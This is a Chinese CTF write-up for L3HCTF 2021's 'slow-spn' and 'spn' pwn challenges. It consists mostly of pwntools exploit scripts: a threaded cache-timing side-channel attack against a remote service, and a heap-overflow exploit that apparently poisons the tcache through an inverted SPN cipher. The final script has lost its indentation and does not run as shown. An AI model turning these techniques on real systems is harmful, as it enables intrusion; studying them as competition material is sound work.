[L3HCTF 2021] Pwn方向writeup - spn & slow-spn
slow-spn
本题里面cacheLine是一个缓存单元的类型,__maccess()函数负责检查cacheLine是否命中,以及置换掉最少命中次数的cacheLine。
思路:侧信道泄露+爆破
/* One entry of the challenge's simulated cache; per the write-up, __maccess()
 * checks these entries for a hit and picks one to evict on a miss. */
struct cacheLine
{
uint32_t tag;       /* identifies what the entry currently caches -- presumably addr >> 10, as in the exploit's calc_tag(); confirm against the binary */
uint32_t last_used; /* bookkeeping consulted when choosing a victim; exact semantics are not shown here */
};
key = flag[0:6]
plain = flag[6:10]
k>>n*4
↓
plaintext -> |SS| -> |P| -> XOR -> ... -> |SS| -> |P| -> cipher
... --> |SS| --(vuln)--> |&cache| --> |P| --> ...
getflag的脚本
from pwn import *
from hashlib import sha256
from pwnlib.util.iters import mbruteforce
context.log_level = 'debug'
def pow(p):
    """Solve the server's SHA-256 proof-of-work on tube *p* and send the answer.

    The server prints ``hashlib.sha256( x + "<suffix>"`` and expects an ``x``
    such that the hex digest of ``x + suffix`` starts with six zeros.  The
    search space is every 8-digit decimal string.

    Note: this function keeps its original name, which shadows the builtin
    ``pow`` inside this script.

    Raises:
        RuntimeError: if the whole search space is exhausted without a hit.
    """
    p.recvuntil(b"hashlib.sha256( x + \"")
    # Use a bytes delimiter so the tube never has to guess an encoding.
    suffix = p.recvuntil(b"\"", drop=True)
    print(suffix)
    proof = mbruteforce(
        lambda x: sha256(x.encode() + suffix).hexdigest()[:6] == '000000',
        '0123456789', length=8, method='fixed')
    if proof is None:
        # mbruteforce returns None when nothing matched; fail loudly instead
        # of handing None to sendline().
        raise RuntimeError("proof-of-work: no 8-digit solution found")
    p.sendline(proof.encode())
def getflag(key, m):
    """Submit one key/plaintext guess over the module-level tube ``p``.

    Returns 0 when the reply is exactly ``b'Wrong.'``; for any other reply the
    raw bytes are printed and the function returns None.
    """
    exchanges = (
        (b'Input possible spn key (hex):', key),
        (b'Input possible spn plaintext (hex):', m),
    )
    for prompt, answer in exchanges:
        p.recvuntil(prompt)
        p.sendline(answer)

    reply = p.recv()
    if reply == b'Wrong.':
        return 0
    print(reply)
# Driver: connect to the flag-check service, clear its proof-of-work, then
# submit one key/plaintext guess.
# NOTE(review): '11' / '1111' look like placeholder values -- presumably they are
# replaced by the recovered key and plaintext hex strings; confirm before running.
p = remote('124.71.173.176' ,8888)
pow(p)
getflag('11' , '1111')
脚本比较乱就贴个爆第一轮的上来好了,后面差不多:
#exp_round1.py
from pwn import *
import sys
from chall import ss_box, p_box, ss_box_addr, p_box_addr
from time import time, sleep
import threading
# (cache line index, tag) -> list of ss_box values whose addresses map to that
# pair; filled by init().
# NOTE(review): defaultdict is not imported by name in this script -- presumably
# it arrives via `from pwn import *`; confirm, or add
# `from collections import defaultdict`.
ss_map = defaultdict(list)
# Same mapping, built from the p_box addresses.
p_map = defaultdict(list)
# Shared between the probing threads of burp_round_1(): set to True by the first
# worker that sees a fast response so the others stop probing.
stop_flag = False
#context.log_level = "debug"
class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    The result is available through :meth:`get_result` after the thread has
    finished; until then (or if ``func`` raised) it is ``None``.
    """

    def __init__(self, func, args=()):
        super().__init__()
        self.func = func
        self.args = args
        # Initialise up front so get_result() never has to swallow an
        # AttributeError for a thread that has not run yet.
        self.result = None

    def run(self):
        """Call the wrapped function and store what it returns."""
        self.result = self.func(*self.args)

    def get_result(self):
        """Return the stored result, or None if none was produced."""
        return self.result

    def get_args(self, _idx=None):
        """Return the whole argument tuple, or the argument at position *_idx*."""
        # Identity check: an index object with a permissive __eq__ must not
        # be mistaken for "no index given".
        return self.args if _idx is None else self.args[_idx]
class MyPipe:
    """Small wrapper around one pwntools tube that speaks the challenge menu.

    ``_typ == "local"`` starts ``_addr`` as a process; any other value treats
    ``_addr`` as a ``(host, port)`` pair and connects to it.
    """

    def __init__(self, _addr, _typ="local"):
        if _typ != "local":
            host, port = _addr[0], _addr[1]
            self.raw_p = remote(host, port)
        else:
            self.raw_p = process(_addr)

    def _menu(self, choice):
        """Wait for the main menu prompt and send *choice* (bytes)."""
        self.raw_p.sendlineafter(b"What to do?\n", choice)

    def maccess(self, addr, speed):
        """Menu option 1: send address *addr* and the *speed* answer."""
        print(f"Addr: {addr}")
        line_index = hex((addr >> 5) & 0x1F)
        tag = hex(addr >> 10)
        print(f"Fetch cache: {line_index}\nCache tag: {tag}")
        self._menu(b"1")
        for prompt, value in ((b"Where?\n", addr), (b"Speed up?\n", speed)):
            self.raw_p.sendlineafter(prompt, str(value).encode())

    def conti(self):
        """Menu option 2."""
        self._menu(b"2")

    def leave(self):
        """Menu option 3."""
        self._menu(b"3")

    def skip(self):
        """Menu option 4."""
        self._menu(b"4")

    def recv(self, num=2048):
        """Receive up to *num* bytes from the tube."""
        data = self.raw_p.recv(num)
        return data

    def recvall(self):
        """Receive until the tube reaches EOF."""
        data = self.raw_p.recvall()
        return data

    def close(self):
        """Close the underlying tube."""
        self.raw_p.close()
def calc_cacheline(addr: int):
    """Return bits 5..9 of *addr*, used by this script as the cache line index."""
    without_offset = addr >> 5
    return without_offset & 0x1F
def calc_tag(addr: int):
    """Return *addr* with its low 10 bits dropped, used by this script as the cache tag."""
    tag = addr >> 10
    return tag
def map_i(addr):
    """Return the ``(cache line index, tag)`` pair for *addr*.

    Same split as calc_cacheline / calc_tag: bits 5..9 and bits 10 and up.
    """
    line_index = (addr >> 5) & 0x1F
    tag = addr >> 10
    return (line_index, tag)
def gen_target(cache_pos, tag):
    """Build an address from a cache line index and a tag (low 5 bits are zero)."""
    tag_part = tag << 10
    line_part = cache_pos << 5
    return tag_part + line_part
def ss_box_item(addr):
    """Return the ss_box entry at address *addr* (4-byte entries from ss_box_addr)."""
    byte_offset = addr - ss_box_addr
    return ss_box[byte_offset // 4]
def p_box_item(addr):
    """Return the p_box entry at address *addr* (4-byte entries from p_box_addr)."""
    byte_offset = addr - p_box_addr
    return p_box[byte_offset // 4]
def ss_item_addr(value):
    """Return the address of the first ss_box entry equal to *value*.

    Raises ValueError (from ``list.index``) when *value* is not in ss_box.
    """
    position = ss_box.index(value)
    return ss_box_addr + position * 4
def p_item_addr(value):
    """Return the address of the first p_box entry equal to *value*.

    Raises ValueError (from ``list.index``) when *value* is not in p_box.
    """
    position = p_box.index(value)
    return p_box_addr + position * 4
def init():
    """Group every ss_box / p_box entry by the cache slot its address maps to.

    Fills the module-level ``ss_map`` and ``p_map`` so that
    ``map[(line index, tag)]`` lists the table values stored at addresses with
    that index/tag, then prints the number of distinct slots per table.
    """
    # Entry k of a table sits at <table>_addr + 4*k.
    for position, value in enumerate(ss_box):
        ss_map[map_i(ss_box_addr + position * 4)].append(value)
    print(f"ss_map size: {hex(len(ss_map))}")

    for position, value in enumerate(p_box):
        p_map[map_i(p_box_addr + position * 4)].append(value)
    print(f"p_map size: {hex(len(p_map))}")
# NOTE: burp_round_1() assigns `s1_list` without declaring it global, so that
# assignment creates a function-local name; this module-level list is not
# updated by it.
s1_list = []
# p_box values recorded by burp_round_1() for probes that answered fast.
p1_list = []
# The ss_box values (s1) that produced those fast answers, in the same order.
s1_matched = []
def burp_round_1():
    """Recover round-1 candidates through response timing.

    Phase 1 opens one remote connection per key of ``ss_map`` (in parallel,
    throttled by ``MAX_THREAD``), pre-loads one ss_box address from that slot
    with ``maccess(..., 1)`` and measures how long the service takes to send
    its first byte after ``conti()``.  A delay below 0.95 s is treated as a
    hit and ends the search.

    Phase 2 walks the ss_box values of the matching slot.  For each value
    ``s1`` it sends ``skip()``, pre-loads the p_box address of ``p_box[s1]``
    and times the response again (threshold 0.96 s).  Hits are appended to
    the module-level ``p1_list`` / ``s1_matched``.

    If phase 1 finds no hit, the function reports that and returns instead of
    failing on an unbound local.
    """
    global stop_flag
    MAX_THREAD = 0x100
    target = ("124.71.173.176", 9999)
    stop_flag = False

    def check_si_fetch(p: MyPipe, cache_info):
        """Probe one ss_box cache slot; return True when the reply was fast."""
        global stop_flag
        try:
            if stop_flag:
                # Another worker already found the slot.
                return False
            p.maccess(ss_item_addr(ss_map[cache_info][0]), 1)  # speed up
            p.conti()
            t1 = time()
            p.recv(1)
            t2 = time()
        finally:
            # Always release the connection, even if the probe raised.
            p.close()
        if t2 - t1 >= 0.95:
            return False
        stop_flag = True
        return True

    pool = []
    init_active = threading.active_count()
    for cache_info in ss_map:
        if stop_flag:
            break
        th = MyThread(func=check_si_fetch,
                      args=(MyPipe(target, "remote"), cache_info))
        th.daemon = True  # Thread.setDaemon() is deprecated
        # Wait until the number of live workers drops below the cap.
        while threading.active_count() - init_active > MAX_THREAD:
            sleep(0.8)
        th.start()
        pool.append(th)

    s1_cache_info = None
    s1_list = []
    for th in pool:
        th.join()
        if th.get_result():
            s1_cache_info = th.get_args(1)
            s1_list = ss_map[s1_cache_info]
            break

    if s1_cache_info is None:
        # Previously this path crashed with UnboundLocalError.
        print("round 1: no ss_box cache slot produced a fast response")
        return

    print(f"s1_cache_info: {s1_cache_info}")
    print(f"s1_list: {s1_list}")

    for s1 in s1_list:
        p_value = p_box[s1]
        p = MyPipe(target, "remote")
        try:
            p.skip()
            p.maccess(p_item_addr(p_value), 1)  # speed up
            p.conti()
            t1 = time()
            p.recv(1)
            t2 = time()
        finally:
            p.close()
        if t2 - t1 >= 0.96:
            print("Miss")
            continue
        p1_cache_info = map_i(p_item_addr(p_value))
        print(f"Got p1 cache info: {p1_cache_info}")
        p1_list.append(p_value)
        s1_matched.append(s1)

    print(f"p1_list: {p1_list}")
    print(f"s1_matched: {s1_matched}")
def exp():
    """Build the cache-slot lookup maps, then run the round-1 timing attack."""
    init()
    burp_round_1()


if __name__ == "__main__":
    exp()
第四组不用爆完,本地调试的时候线程开多点爆完验证一下就好
[remote]
round 1:
p1_list: [24177, 24160, 24176, 20336]
s1_matched: [20075, 20072, 20074, 20070]
round 2:
p2_list: [29651, 29634]
s2_matched: [10975, 10972]
round 3:
p3_list: [51619, 55459, 51635]
s3_matched: [59445, 59449, 59447]
然后根据上面的信息拿mlist和klist:
# Timing-attack results, copied from the [remote] listing.
# ss_box must already be in scope here (e.g. `from chall import ss_box`).
p1_list = [24177, 24160, 24176, 20336]
s1_matched = [20075, 20072, 20074, 20070]
p2_list = [29651, 29634]
s2_matched = [10975, 10972]
p3_list = [51619, 55459, 51635]
s3_matched = [59445, 59449, 59447]

# Plaintext candidates: the ss_box index of every round-1 match, as 4 hex digits.
mlist = [f"{ss_box.index(s_out):04x}" for s_out in s1_matched]

# Key-word candidates: a P output of one round XOR the index of an S output
# of the next round, for every pairing.
k1list = [p_out ^ ss_box.index(s_out) for s_out in s2_matched for p_out in p1_list]
k2list = [p_out ^ ss_box.index(s_out) for s_out in s3_matched for p_out in p2_list]

# Keep the pairs where the low 12 bits of k1 equal k2 >> 4, and merge each
# pair into one value by appending k2's low nibble to k1.
klist = [
    (k1 << 4) + (k2 & 0xf)
    for k1 in k1list
    for k2 in k2list
    if (k1 & 0xfff) == (k2 >> 4)
]
print(mlist)
spn
# 4-bit substitution table; re_s() inverts it with sbox.index().
sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
# Bit permutation with 1-based positions (re_p() subtracts 1 before shifting).
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
# Single-bit masks from the MSB down; not referenced by the functions visible in this script.
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
# Five 16-bit round keys; dec() applies them from the last one to the first.
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
def re_s(c):
    """Apply the inverse S-box to each of the four low nibbles of *c*."""
    res = 0
    for shift in range(0, 16, 4):
        nibble = (c >> shift) & 0xF
        res |= sbox.index(nibble) << shift
    return res
def re_p(c):
    """Move each set bit of the 16-bit word *c* to the position given by pbox.

    Bit ``i`` (counted from the MSB) goes to position ``pbox[i] - 1``.
    """
    res = 0
    for source, target in enumerate(pbox):
        if c & (0x8000 >> source):
            res |= 0x8000 >> (target - 1)
    return res
def dec(m):
    """Decrypt one 2-byte block *m* and return 2 bytes.

    Both input and output are little-endian 16-bit words.  The round keys
    are applied from ``key[-1]`` back to ``key[0]``.
    """
    state = (m[1] << 8) | m[0]
    state ^= key[-1]
    # Three rounds of: inverse S-box, round key, inverse permutation.
    for back in (2, 3, 4):
        state = re_p(re_s(state) ^ key[-back])
    # The final round has no permutation.
    state = re_s(state) ^ key[0]
    return bytes([state & 0xff, state >> 8])
def decrypt(m):
    """Run dec() over *m* two bytes at a time and return the joined result.

    The length of *m* must be even (checked with an assertion).
    """
    assert len(m) % 2 == 0
    return b''.join(dec(m[start:start + 2]) for start in range(0, len(m), 2))
# Example: print what decrypt() returns for b'4N4N4N4N' under the hard-coded round keys.
print(decrypt(b'4N4N4N4N'))
过spn的脚本,调用decrypt(想要在内存写的东西),然后把返回值扔过去就行了。
密文长度必须是2的倍数,如果不是2的倍数远程会默认后面是\x00或者是其他的奇奇怪怪的东西,为了避免错误建议用2的倍数
鉴于decrypt出来的值不太稳定,改成两次edit:第一次收集发生变化的部分放进nonaddlist,第二次正常打。
from pwn import *
#p = process("./SPN_ENC", env = {"LD_PRELOAD": "./libc-2.27.so"})
#p = process("./SPN_ENC")
# Tube shared by malloc/edit/free/show/exp below; the connection is opened at import time.
p = remote("124.71.194.126", 9999)
context.log_level = "debug"
# 4-bit substitution table; re_s() inverts it with sbox.index().
sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
# Bit permutation with 1-based positions (re_p() subtracts 1 before shifting).
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
# Single-bit masks from the MSB down; not referenced by the functions visible in this script.
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
# Five 16-bit round keys; dec() applies them from the last one to the first.
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
# 2-byte payload blocks for which dec() adds 1 to the high output byte; exp()
# appends a block here when the word echoed by the server differs from the one sent.
nonaddlist = []
def re_s(c):
    """Apply the inverse S-box to each of the four low nibbles of *c*."""
    inverted = []
    for _ in range(4):
        c, low = divmod(c, 16)
        inverted.append(sbox.index(low))
    # inverted[0] belongs to the least significant nibble.
    return sum(value << (4 * pos) for pos, value in enumerate(inverted))
def re_p(c):
    """Move each set bit of the 16-bit word *c* to the position given by pbox.

    Bit ``i`` (counted from the MSB) goes to position ``pbox[i] - 1``.
    """
    res = 0
    mask = 0x8000
    for target in pbox[:16]:
        if c & mask:
            res |= 0x8000 >> (target - 1)
        mask >>= 1
    return res
def dec(m):
    """Decrypt one 2-byte block *m*, with a +1 correction for listed blocks.

    Input and output are little-endian 16-bit words.  When *m* is in
    ``nonaddlist`` the high output byte is incremented by one.
    NOTE(review): that increment would push a high byte of 0xff out of range
    for bytes() -- confirm this cannot occur for the payloads used.
    """
    addnum = 1 if m in nonaddlist else 0
    state = (m[1] << 8) | m[0]
    state ^= key[-1]
    # Three rounds of: inverse S-box, round key, inverse permutation.
    for back in (2, 3, 4):
        state = re_p(re_s(state) ^ key[-back])
    # The final round has no permutation.
    state = re_s(state) ^ key[0]
    low_byte = state & 0xff
    high_byte = (state >> 8) + addnum
    return bytes([low_byte, high_byte])
def decrypt(m):
    """Run dec() over *m* two bytes at a time and return the joined result.

    The length of *m* must be even (checked with an assertion).
    """
    assert len(m) % 2 == 0
    pieces = [dec(m[start:start + 2]) for start in range(0, len(m), 2)]
    return b''.join(pieces)
def malloc(size, idx):
    """Menu option 1: send *size* and then *idx* over the module-level tube ``p``."""
    p.sendlineafter(b"0.exit\n", b"1")
    for prompt, number in ((b"Size:\n", size), (b"Index:\n", idx)):
        p.sendlineafter(prompt, str(number).encode())
def edit(index, size, content):
    """Menu option 2: send *index*, *size*, then the raw *content* bytes.

    *content* is sent without a trailing newline.
    """
    p.sendlineafter(b"0.exit\n", b"2")
    for prompt, number in ((b"Index:\n", index), (b"Size\n", size)):
        p.sendlineafter(prompt, str(number).encode())
    p.sendafter(b"Content\n", content)
def free(idx):
    """Menu option 3: send *idx* over the module-level tube ``p``."""
    p.sendlineafter(b"0.exit\n", b"3")
    encoded_index = str(idx).encode()
    p.sendlineafter(b"Index:\n", encoded_index)
def show(idx):
    """Menu option 4: send *idx* over the module-level tube ``p``."""
    p.sendlineafter(b"0.exit\n", b"4")
    encoded_index = str(idx).encode()
    p.sendlineafter(b"Index:\n", encoded_index)
#: 0x555555554000
# Exploit driver for the spn service, using the module-level tube `p`.
# Outline as visible in the code: read the leaked "gift" address, allocate one
# 0x40 chunk and three 0x20 chunks, free the three small ones, then use edit()
# on chunk 0 with 0x58 bytes (more than its 0x40 size) to write
# p64(0) + p64(0x31) + p64(gift) past its end.
# NOTE(review): this looks like tcache poisoning (the commented-out libc-2.27
# preload points that way) so that the second later malloc lands on `gift`
# -- confirm against the binary.
def exp():
# The service prints the leak as hex after "gift:".
p.recvuntil(b"gift:")
gift = int(p.recvuntil(b"\n", drop=True).decode(), 16)
# elf_base is only printed; 0x2040E0 is presumably gift's offset inside the ELF -- confirm.
elf_base = gift - 0x2040E0
print("gift:", hex(gift))
print("elf_base:", hex(elf_base))
# malloc
malloc(0x40, 0)
for i in range(3):
malloc(0x20, i+1)
free(3)
free(2)
free(1)
# The payload is passed through decrypt() first -- per the write-up, the
# service applies the SPN to what it receives.
payload = b"A"*0x40+p64(0)+p64(0x31)+p64(gift)
payload_dec = decrypt(payload)
print("Payload len:", hex(len(payload)))
print(payload.hex())
print(payload_dec.hex())
w_size = 0x58
# First edit: calibration pass. The service echoes one "w:<hex>" line per
# 16-bit word; compare each with the word that was sent.
edit(0, w_size, payload_dec)
for i in range(0, w_size*2, 4):
p.recvuntil(b"w:")
# Swap the two hex byte pairs so the little-endian bytes read as one 16-bit word.
tar = payload_dec.hex()[i+2:i+4]+payload_dec.hex()[i:i+2]
act = p.recvuntil(b"\n", drop=True).decode().rjust(4, "0")
print(tar, act)
if tar != act:
# Remember the plaintext block so dec() applies its +1 correction next time.
nonaddlist.append(bytes([payload[i//2]])+bytes([payload[i//2+1]]))
print(nonaddlist)
# Second edit: resend with the corrections collected above.
edit(0, w_size, decrypt(payload))
# fetch
malloc(0x20, 5)
malloc(0x20, 6)
# Write 8 bytes through index 6.
edit(6, 8, b"A"*8)
print("gift:", hex(gift))
# Send menu option 5 and hand the session to the user.
p.sendline(b"5")
p.interactive()
if __name__ == "__main__":
exp()